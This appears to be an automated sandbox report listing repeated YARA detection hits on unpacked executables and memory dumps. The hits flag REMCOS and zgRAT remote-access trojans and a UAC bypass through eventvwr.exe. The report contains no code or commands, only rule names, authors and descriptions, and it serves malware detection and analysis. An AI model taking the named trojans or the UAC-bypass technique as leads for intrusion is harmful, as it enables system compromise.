Source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.kyFBQxVbsg.exe.4ba0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.kyFBQxVbsg.exe.4ba0000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.Qerdo.exe.5440000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000013.00000002.606363285.00000000048F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000000.00000002.541870137.0000000004BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000018.00000002.613026227.0000000005440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
